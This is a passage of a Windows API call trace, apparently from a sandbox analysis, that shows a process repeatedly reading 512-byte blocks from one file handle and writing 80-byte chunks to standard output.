hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.207] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.207] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] GetFileType (hFile=0x4c) returned 0x1 [0094.207] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.207] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.208] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.208] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] GetFileType (hFile=0x4c) returned 0x1 [0094.208] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.208] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.209] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.209] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.209] GetFileType (hFile=0x4c) returned 0x1 [0094.209] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.210] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.210] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.210] GetFileType (hFile=0x4c) returned 0x1 [0094.210] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.211] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.211] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] GetFileType (hFile=0x4c) returned 0x1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.211] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.211] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.212] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.212] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] GetFileType (hFile=0x4c) returned 0x1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.212] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.212] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.213] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.213] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f274*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] GetFileType (hFile=0x4c) returned 0x1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.213] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f2c4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.213] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f314*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f314*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f364*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f364*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f3b4*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f404*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f404*, lpNumberOfBytesWritten=0x26e458*=0x50, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] GetFileType (hFile=0x4c) returned 0x1 [0094.214] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.214] WriteFile (in: hFile=0x4c, lpBuffer=0x26f454*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e458, lpOverlapped=0x0 | out: lpBuffer=0x26f454*, lpNumberOfBytesWritten=0x26e458*=0x20, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.214] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.214] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.214] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.214] _get_osfhandle 